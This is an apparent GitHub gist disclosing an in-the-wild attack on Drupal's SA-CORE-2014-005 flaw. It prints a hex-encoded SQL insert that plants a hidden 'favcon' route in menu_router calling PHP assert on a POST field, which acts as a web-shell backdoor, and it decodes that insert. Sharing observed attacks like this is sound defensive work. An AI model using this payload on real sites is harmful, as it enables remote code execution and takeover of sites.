Skip to content

Instantly share code, notes, and snippets.

Created October 18, 2014 17:53
What would you like to do?
New menu_router attack for Drupal SA-CORE-2014-005
insert into menu_router (path,load_functions,to_arg_functions,description,access_callback,access_arguments) values (0x666176636f6e,0x00,0x00,0x00,0x617373657274,0x613a313a7b693a303b733a31393a224061737365727428245f504f53545b645d293b223b7d)
Translates to:
path: favcon
access_callback: assert
access_arguments: a:1:{i:0;s:19:"@assert($_POST[d]);";}
This appears to set the stage for a follow-up where there's an attack payload in the POST.
Stay alert. Stay alive.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment